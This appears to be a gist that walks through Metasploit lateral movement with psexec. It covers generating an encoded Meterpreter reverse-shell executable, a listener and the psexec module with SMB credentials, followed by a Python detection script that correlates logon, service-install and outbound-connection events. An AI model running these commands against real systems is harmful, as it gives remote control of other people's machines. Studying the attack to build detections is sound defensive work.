Created September 5, 2017 18:52
Metasploit: Custom Psexec Executable
## Metasploit: Custom Psexec Executable ##
# The first thing we need to do is generate a custom executable to use with Meterpreter.
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe
# Next we need to set up a multi handler to listen for connections.
$ msf > use exploit/multi/handler
$ msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
$ PAYLOAD => windows/meterpreter/reverse_tcp
$ msf exploit(handler) > set LHOST 192.168.0.1
$ LHOST => 192.168.0.1
$ msf exploit(handler) > set LPORT 4445
$ LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...
# In another msfconsole session we need to configure the psexec exploit module to use our custom executable.
$ msf > use exploit/windows/smb/psexec
$ msf exploit(psexec) > set RHOST 192.168.0.2
$ RHOST => 192.168.0.2
$ msf exploit(psexec) > set SMBUser user
$ SMBUser => user
$ msf exploit(psexec) > set SMBPass pass
$ SMBPass => pass
$ msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
$ EXE::Custom => /path/to/custom.exe
# Finally, we need to run the exploit. If everything worked, you should see a new meterpreter session open in multi/handler.
$ msf exploit(psexec) > exploit
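
On the target, a psexec-style run like the one above shows up as a network logon, a service installation and then an outbound connection from the new service binary. The following Python detection logic is an added example, not part of the original gist: it correlates Security 4624 (logon type 3), System 7045 and Sysmon 3 events on one host. The flat event shape, the field names and the sample events are constructed for illustration, and it assumes the executable lands directly in the Windows directory (the ADMIN$ share).

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not from the page). The flat dict shape and the
# field names are assumptions; map them from your own SIEM export.
EVENTS = [
    {"ts": "2017-09-05T18:40:01", "host": "WS02", "ev": "Security/4624",
     "logon_type": 3, "user": "user", "src_ip": "192.168.0.1"},
    {"ts": "2017-09-05T18:40:03", "host": "WS02", "ev": "System/7045",
     "service": "kQzLpWnR", "image": r"%SystemRoot%\hTgYbNmK.exe"},
    {"ts": "2017-09-05T18:40:04", "host": "WS02", "ev": "Sysmon/3",
     "image": r"C:\Windows\hTgYbNmK.exe", "dst": "192.168.0.1:4445"},
    {"ts": "2017-09-05T19:00:00", "host": "WS03", "ev": "System/7045",
     "service": "VendorAgent", "image": r"C:\Program Files\Vendor\agent.exe"},
]

WINDOW = timedelta(seconds=30)
# An .exe sitting directly in the Windows directory, which is what ADMIN$ exposes.
DROPPED_EXE = re.compile(
    r"^(%systemroot%|[a-z]:\\windows|\\\\[^\\]+\\admin\$)\\[^\\]+\.exe$", re.I)

def when(event):
    return datetime.fromisoformat(event["ts"])

def exe_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_remote_service_exec(events):
    """Correlate network logon -> service install -> outbound connection."""
    alerts = []
    for svc in events:
        if svc["ev"] != "System/7045" or not DROPPED_EXE.match(svc["image"]):
            continue
        near = [e for e in events if e["host"] == svc["host"]
                and abs(when(e) - when(svc)) <= WINDOW]
        logons = [e["src_ip"] for e in near if e["ev"] == "Security/4624"
                  and e["logon_type"] == 3 and when(e) <= when(svc)]
        calls = [e["dst"] for e in near if e["ev"] == "Sysmon/3"
                 and when(e) >= when(svc)
                 and exe_name(e["image"]) == exe_name(svc["image"])]
        if logons:  # a service install with no preceding network logon is skipped
            alerts.append({"host": svc["host"], "service": svc["service"],
                           "image": svc["image"], "logon_from": logons,
                           "callbacks": calls,
                           "severity": "high" if calls else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_remote_service_exec(EVENTS):
        print(alert)
```

The 30-second window and the path pattern are tuning choices; widen or narrow them against your own baseline of legitimate remote service installs.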